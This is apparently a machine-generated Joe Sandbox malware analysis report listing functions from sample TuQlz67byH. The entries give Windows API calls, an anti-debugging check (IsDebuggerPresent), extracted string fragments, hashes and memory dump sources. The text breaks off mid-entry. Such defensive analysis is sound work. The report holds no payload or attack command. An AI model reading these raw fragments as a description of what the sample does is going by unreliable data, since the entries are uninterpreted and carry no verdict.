Instruction Fuzzy Hash: 07511871A002459FDB21CF75C8456AABBE5EF81308F18607FD092AB351E7B49647CB52

Function 00ED6368 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,00ED8F1C,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00ED639C
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00ED8F1C,?,?,00000000,?,00000000), ref: 00ED63BA

Strings

R[, xrefs: 00ED6396

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: String
String ID: R[
API String ID: 2568140703-3972925902
Opcode ID: 9e55260f860fa02fd2c195a75c5c4e6eba1323cda7edd84aa37e2f76effc924e
Instruction ID: afd909be6778611ff3529e274dc0d6a0bdc53fcae1a66eacd9c579a136145a55
Opcode Fuzzy Hash: 9e55260f860fa02fd2c195a75c5c4e6eba1323cda7edd84aa37e2f76effc924e
Instruction Fuzzy Hash: 3EF07A3200015ABBCF125FA1DC09DDE3F66EF88360F059011FA186A220C732D976AB90

Function 00ED9FAA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(E8458D00,?,00EDA1F9,00EDA1ED,00000000), ref: 00ED9FDC

Strings

ji!^, xrefs: 00ED9FB5

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: Info
String ID: ji!^
API String ID: 1807457897-848646596
Opcode ID: 344bdef0a12a514c6f97034786dfde4b19fea322c847f716849bfb51d2c695bb
Instruction ID: c5ab0471b2b429078723320255feadf21b97e7aee5fd45a3ddcfdef1e6d101b3
Opcode Fuzzy Hash: 344bdef0a12a514c6f97034786dfde4b19fea322c847f716849bfb51d2c695bb
Instruction Fuzzy Hash: 2A515D719041589EDB218E28CD80BE67BB8EB45304F2815FEE19AE7282C2759E47DB21

Non-executed Functions

Function 00F0AA47 Relevance: 31.9, Strings: 24, Instructions: 1933COMMON

Download Yara Rule

Strings

D, xrefs: 00F0B71E
|, xrefs: 00F0BB89
T, xrefs: 00F0C02F
89&', xrefs: 00F0B813
`onm, xrefs: 00F0B60B
()./, xrefs: 00F0B8A2
LKJI, xrefs: 00F0B5BE
:WUE, xrefs: 00F0C58F, 00F0C59E
mjkh, xrefs: 00F0B6B0
<=:;, xrefs: 00F0B808
lkji, xrefs: 00F0B616
`Y^_, xrefs: 00F0B876
xgfe, xrefs: 00F0B5F5
dcba, xrefs: 00F0B600
tsrq, xrefs: 00F0B5D4
<=2, xrefs: 00F0B8D9
%*+(, xrefs: 00F0AD0F, 00F0AD1E
DCBA, xrefs: 00F0B75F, 00F0B76E
WP, xrefs: 00F0ABC7
@ONM, xrefs: 00F0B5B3
QNOL, xrefs: 00F0B64D
tuJK, xrefs: 00F0B83F
89>?, xrefs: 00F0B8CE
AR, xrefs: 00F0ABE8

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: %*+($()./$89&'$89>?$:WUE$<=2$<=:;$@ONM$AR$D$DCBA$LKJI$QNOL$T$WP$`Y^_$`onm$dcba$lkji$mjkh$tsrq$tuJK$xgfe$|
API String ID: 0-1418943773
Opcode ID: a9f1e68edfaf0ae1e626f109336ed9d19a6b5191b739eb3bbf20b7e6025201f9
Instruction ID: 47f0eb73e47887bd1069f50717cdbba1be14a042177983bf6b43c6f37dc62876
Opcode Fuzzy Hash: a9f1e68edfaf0ae1e626f109336ed9d19a6b5191b739eb3bbf20b7e6025201f9
Instruction Fuzzy Hash: CCF287B15093819BD770CF14C894BAFBBE2BFD5310F54892CE4C99B291DB359884EB92

Function 00F16EC4 Relevance: 21.7, Strings: 17, Instructions: 438COMMON

Download Yara Rule

Strings

]{, xrefs: 00F170BF, 00F170CB
_Y, xrefs: 00F17519
kW, xrefs: 00F17258
hi, xrefs: 00F17A75
N[, xrefs: 00F1724D
WH, xrefs: 00F178F4
CG, xrefs: 00F1790A
Gt, xrefs: 00F16ED0
WQ, xrefs: 00F17503
=], xrefs: 00F17242
/), xrefs: 00F17545
JG, xrefs: 00F178FF
(a*c, xrefs: 00F1701F
?m,o, xrefs: 00F17014
sm, xrefs: 00F17708
S], xrefs: 00F1750E
%e6g, xrefs: 00F1702A

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: %e6g$(a*c$=]$?m,o$CG$Gt$JG$N[$WH$]{$hi$kW$/)$S]$WQ$_Y$sm
API String ID: 0-1131134755
Opcode ID: 7fe6c7d6d9efdaf882a2b9df3b8a54a15053ee68894a73401dbca1371ba866d9
Instruction ID: 89d67904effade55a730d26dee40440354d84b31fff8bb8f31c04d0ce2a42366
Opcode Fuzzy Hash: 7fe6c7d6d9efdaf882a2b9df3b8a54a15053ee68894a73401dbca1371ba866d9
Instruction Fuzzy Hash: 5A42B6B444D3858AE274CF25D581B8EBAF1BB92740F608E1DE1ED5B255DB708049CF93

Function 00EDC9E9 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ED4EB1: GetLastError.KERNEL32(?,00000008,00ED9482), ref: 00ED4EB5
Part of subcall function 00ED4EB1: SetLastError.KERNEL32(00000000,00EEC480,00000024,00ED0419), ref: 00ED4F57

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00EDCAF5
IsValidCodePage.KERNEL32(00000000), ref: 00EDCB3E
IsValidLocale.KERNEL32(?,00000001), ref: 00EDCB4D
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00EDCB95
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00EDCBB4

Strings

ji!^, xrefs: 00EDC9F1
||, xrefs: 00EDCA4E

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID: ji!^$||
API String ID: 415426439-1719436291
Opcode ID: fece7ab4aed3dc757b6294947fddf9ffa98311347c633dadb0ea12b79d8efde8
Instruction ID: 6b61c2353dd773ac890e15197373483ed445a3774b79198c89e4e3662681efe7
Opcode Fuzzy Hash: fece7ab4aed3dc757b6294947fddf9ffa98311347c633dadb0ea12b79d8efde8
Instruction Fuzzy Hash: AD517271A0020A9FDB10DFA5CC45AAE77B8FF49784F24546BE911FB290E770D906CB61

Function 00EDD39B Relevance: 11.9, APIs: 1, Strings: 5, Instructions: 1436COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00EDD57F

Strings

1#INF, xrefs: 00EDD4D1
1#QNAN, xrefs: 00EDD4AE
1#SNAN, xrefs: 00EDD4A7
ji!^, xrefs: 00EDD3A6
1#IND, xrefs: 00EDD4A0

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN$ji!^
API String ID: 4168288129-1710827490
Opcode ID: 68ed365e4e41049db4c55fc87faea965f34adcb6a8070042ba7cd134f2ff22bc
Instruction ID: 63bb56c8b7b9cd0758e9854dbec1a7da5aa000fffe51977e957cab4854b540a0
Opcode Fuzzy Hash: 68ed365e4e41049db4c55fc87faea965f34adcb6a8070042ba7cd134f2ff22bc
Instruction Fuzzy Hash: FFD2F571E082298FDB659E28DD447EAB7B5EB84309F1451EAD40DF7340E778AE828F41

Function 00F1665F Relevance: 11.4, Strings: 9, Instructions: 103COMMON

Download Yara Rule

Strings

@-r/, xrefs: 00F166DE
I)C+, xrefs: 00F166D6
W!Q#, xrefs: 00F166C6
,A&C, xrefs: 00F16706
W5W7, xrefs: 00F166EE
|1]3, xrefs: 00F166E6
!E4G, xrefs: 00F1670E
;IJK, xrefs: 00F16716
z=Q?, xrefs: 00F166FE

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: !E4G$,A&C$;IJK$@-r/$I)C+$W!Q#$W5W7$z=Q?$|1]3
API String ID: 0-2124749398
Opcode ID: f2cd62d45247a4721067a6d54a2199a1ff98fbe07b7bed4634b5cc81127c74ee
Instruction ID: 90aaf6dba494a3794d807e54b1801761520fd376309540f274b015a299639fae
Opcode Fuzzy Hash: f2cd62d45247a4721067a6d54a2199a1ff98fbe07b7bed4634b5cc81127c74ee
Instruction Fuzzy Hash: 243160B05083809BCB009F95D8A066BBBF0EF86799F40591CF8C68B261E334D884DB46

Function 00EDC085 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ED4EB1: GetLastError.KERNEL32(?,00000008,00ED9482), ref: 00ED4EB5
Part of subcall function 00ED4EB1: SetLastError.KERNEL32(00000000,00EEC480,00000024,00ED0419), ref: 00ED4F57

GetACP.KERNEL32(?,?,?,?,?,?,00ED1848,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00EDC146
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00ED1848,?,?,?,00000055,?,-00000050,?,?), ref: 00EDC171
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00EDC2D4

Strings

ji!^, xrefs: 00EDC28B
utf8, xrefs: 00EDC243
||, xrefs: 00EDC0C7

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: ji!^$utf8$||
API String ID: 607553120-2557250897
Opcode ID: 4f6672bee9cd1ebf4e259a709af4051743ce307fff7a7e0c4b0ef1814e817c5c
Instruction ID: 0cbf5e0fe631ea31635ba3a969cbefbea2789d078eae084615879b40d10befcf
Opcode Fuzzy Hash: 4f6672bee9cd1ebf4e259a709af4051743ce307fff7a7e0c4b0ef1814e817c5c
Instruction Fuzzy Hash: F871E671600607AADB24BB75CC46BAA73E8EF44784F24606BF505F7391E670D942C7A0

Function 00F1F2B8 Relevance: 9.1, Strings: 7, Instructions: 359COMMON

Download Yara Rule

Strings

aenQ, xrefs: 00F1F642
fedc, xrefs: 00F1F65A
{l`~, xrefs: 00F1F564
f@~!, xrefs: 00F1F4D7
mlc@, xrefs: 00F1F634
`tii, xrefs: 00F1F56B
ggxz, xrefs: 00F1F55D

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: `tii$aenQ$f@~!$fedc$ggxz$mlc@${l`~
API String ID: 0-3056062858
Opcode ID: 81e2fee55be0e0ed83158224188c4395161ee7ac948e32e04c625285de5dfabf
Instruction ID: 89babdddd6c782b5af8ac93c80104d67edd3ab881ef6583e6e9ad17b32eed4a7
Opcode Fuzzy Hash: 81e2fee55be0e0ed83158224188c4395161ee7ac948e32e04c625285de5dfabf
Instruction Fuzzy Hash: FAD12AB4801B409FD360EF398646797BFF0BB06300F844A5DE4EA5B696D731A41ACBD2

Function 00EDC814 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00EDCB32,00000002,00000000,?,?,?,00EDCB32,?,00000000), ref: 00EDC8AD
GetLocaleInfoW.KERNEL32(?,20001004,00EDCB32,00000002,00000000,?,?,?,00EDCB32,?,00000000), ref: 00EDC8D6
GetACP.KERNEL32(?,?,00EDCB32,?,00000000), ref: 00EDC8EB

Strings

ACP, xrefs: 00EDC832
OCP, xrefs: 00EDC868

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: f03fa993d7acd41e2f6cf48294bf9c68e4ffef50bd35f5cb00131fdb767b63e4
Instruction ID: c94dab2cd7ad06237558f9edf4e97bad22e469efba67a787982e48340af25935
Opcode Fuzzy Hash: f03fa993d7acd41e2f6cf48294bf9c68e4ffef50bd35f5cb00131fdb767b63e4
Instruction Fuzzy Hash: 6A21953AA00107DADB288F65C941E9773A6EF54BD8B765426E909F7310EB32ED42E350

Function 00F1AC81 Relevance: 7.5, Strings: 6, Instructions: 38COMMON

Download Yara Rule

Strings

upH}, xrefs: 00F1ACAD
1 G@, xrefs: 00F1ACA6
hX]N, xrefs: 00F1AC9F
n\+H, xrefs: 00F1AC98
%AUU, xrefs: 00F1AC91
iP`R, xrefs: 00F1AC8A

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: %AUU$1 G@$hX]N$iP`R$n\+H$upH}
API String ID: 0-3520097955
Opcode ID: 6209497fda56ba42c0ca55be78a875de8b250e6332eb0d406aaca2855171a349
Instruction ID: 8bcb5783aa6991ad517eb07dd539f6147c867d186d370fa81eb4a4470e287d91
Opcode Fuzzy Hash: 6209497fda56ba42c0ca55be78a875de8b250e6332eb0d406aaca2855171a349
Instruction Fuzzy Hash: 580129B0901745CBCB21CF95C6506AFFBF1EF06741F54480DD886AB651C334AA84DBA6

Function 00ECFEF0 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

Strings

G, xrefs: 00ECFF0B, 00ED008E, 00ED02B7, 00ED0250, 00ED00DD
G, xrefs: 00ED0233, 00ED0211

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: G$G
API String ID: 0-3574868976
Opcode ID: b78e9bc5a25061f1abca4818c36b3245c47596756df3441acd3b4668cd2eb70a
Instruction ID: 42bb071ca33cedb590402e8a02130422c30c219355cf9a5a312174aefd535617
Opcode Fuzzy Hash: b78e9bc5a25061f1abca4818c36b3245c47596756df3441acd3b4668cd2eb70a
Instruction Fuzzy Hash: D2F13E71E012199FDF14CFA8C980BADB7B1FF88314F19926AE815BB391D7319D028B90

Function 00EDC498 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00ED4EB1: GetLastError.KERNEL32(?,00000008,00ED9482), ref: 00ED4EB5
Part of subcall function 00ED4EB1: SetLastError.KERNEL32(00000000,00EEC480,00000024,00ED0419), ref: 00ED4F57

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EDC4EC
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EDC536
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EDC5FC

Strings

ji!^, xrefs: 00EDC4A3

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID: ji!^
API String ID: 661929714-848646596
Opcode ID: 1a1f1ba36339d63294e8e0e9bbbd406f747fe601be05e6601d8d753eeabbd1bc
Instruction ID: 22034e0115797ec088805d48b57cd277848ba862975e740f9440c8ff8b3c755b
Opcode Fuzzy Hash: 1a1f1ba36339d63294e8e0e9bbbd406f747fe601be05e6601d8d753eeabbd1bc
Instruction Fuzzy Hash: 8261B2725001079FDB28DF24CD82BBA77A8EF04784F20617BE915E6389EB35E942CB50

Function 00EEE1CF Relevance: 7.2, Strings: 5, Instructions: 922COMMON

Download Yara Rule

Strings

0, xrefs: 00EEF316
0, xrefs: 00EEEC99
0, xrefs: 00EEED60
i, xrefs: 00EEF7C2
@, xrefs: 00EF0409

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: 0$0$0$@$i
API String ID: 0-3124195287
Opcode ID: 12572a0e7900ef4fab88ceb8c21c045fe7f3c85080e9f8e24115e1caf920c67f
Instruction ID: 518dcf209ad0918af66e3b633371b2868617df24fc824ab71800c79d66d27ca2
Opcode Fuzzy Hash: 12572a0e7900ef4fab88ceb8c21c045fe7f3c85080e9f8e24115e1caf920c67f
Instruction Fuzzy Hash: 7862EF7160C3868BD318CF29C49076ABBE1AFC5308F289A6DE4D9A7391D774DD49CB42

Function 00ECDA73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00ECDB6B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00ECDB75
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00ECDB82

Strings

ji!^, xrefs: 00ECDA7E

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: ji!^
API String ID: 3906539128-848646596
Opcode ID: 01c0fd59a7dcb20f33440275e9b1e1150662ebd24036767fad87c24681b13854
Instruction ID: e853b57eeb1ba8751ca73b1c60191344dd4fb7d29c1e3d0ceb5bbdeb7cabdc16
Opcode Fuzzy Hash: 01c0fd59a7dcb20f33440275e9b1e1150662ebd24036767fad87c24681b13854
Instruction Fuzzy Hash: 9631B27490122CABCB21DF65DD89B8DBBF8AF08310F5051EAE41CA7250EB759F868F44

Function 00ED3C92 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00ED3D1F

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
